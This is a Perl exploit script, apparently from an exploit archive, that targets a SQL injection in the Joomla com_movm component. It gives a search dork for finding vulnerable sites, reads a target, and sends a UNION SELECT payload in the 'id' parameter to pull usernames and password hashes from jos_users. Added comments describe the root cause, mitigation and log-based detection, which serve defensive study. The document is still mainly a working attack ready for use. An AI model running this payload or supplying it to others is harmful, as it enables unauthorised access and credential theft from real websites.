#Exploit Title: Joomla com_movm SQL Injection exploit
#Dork: inurl:"index.php?option=com_movm"
#Date: 24/12/2012
#Exploit Author: D35m0nd142
#Vendor Homepage: http://www.joomla.org
#Tested on Ubuntu 12.04
#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Request::Common;
# Proof-of-concept for a SQL injection in the `id` parameter of the Joomla
# com_movm component. The script sends one GET request whose `id` value
# carries a UNION SELECT against the jos_users table, then prints the first
# 32-hex-digit string it finds in the response body.
#
# Reviewer notes (defensive reading of this PoC):
#  - Root cause is presumably that the component places `id` into a SQL
#    statement without casting or quoting it; the component source is not
#    shown here, so confirm before relying on that.
#  - Mitigation: treat `id` as an integer or use bound parameters in the
#    component's query, and update or remove the component.
#  - Detection: web-server or WAF logs showing option=com_movm requests whose
#    `id` contains UNION, SELECT, group_concat or jos_users.
#  - The file has no `use strict` / `use warnings`; $agent, $host, $resp and
#    $content below are undeclared package globals.

# Clears the terminal through the shell; the command string is fixed.
system("clear");
print "***************************************************\n";
print "* Joomla Component com_movm SQL Injection exploit *\n";
print "* Created by D35m0nd142 *\n";
print "****************************************************\n\n";
sleep 1;
print "Enter target --> ";
sleep 1;
# The target is read from STDIN with only the trailing newline removed; no
# other validation is applied before it is used to build the URL.
chomp(my $target = <STDIN>);
# Prepend a scheme when the input does not contain "http://". The match is
# unanchored and does not recognise "https://".
if($target !~ /http:\/\//)
{
$target = "http://$target";
}
$agent = LWP::UserAgent->new();
# Request URL. The quote after 999999 ends the SQL string literal, the
# UNION ALL SELECT supplies ten columns (%2C is an encoded comma, + a space)
# with group_concat(username,0x3a,password) in the tenth, and the trailing
# "-- " comments out the rest of the original statement. The column count
# and the "jos_" table prefix are fixed values in this string.
$host = $target."/index.php?option=com_movm&controller=product&task=product&id=999999'+UNION+ALL+SELECT+1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2Cgroup_concat(username,0x3a,password)+FROM+jos_users--+";
$resp = $agent->request(HTTP::Request->new(GET=>$host));
# The HTTP status is never checked; the body of an error page is searched the
# same way as a successful response.
$content = $resp->content;
# Any run of 32 hex digits anywhere in the body counts as a hit, so an
# unrelated hex string in the page would be reported as a password. What is
# printed is presumably an MD5-style hash rather than a cleartext password.
if ($content =~/([0-9a-fA-F]{32})/){
print "[+] Password found --> $1\n\n";
sleep 1;
}
else
{
# A miss only means no 32-hex-digit string appeared in the response; it is
# not evidence that the site is unaffected.
print "No password found .\n";
}
//The information contained within this publication is
//supplied "as-is" with no warranties or guarantees of fitness
//of use or otherwise. Neither Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information.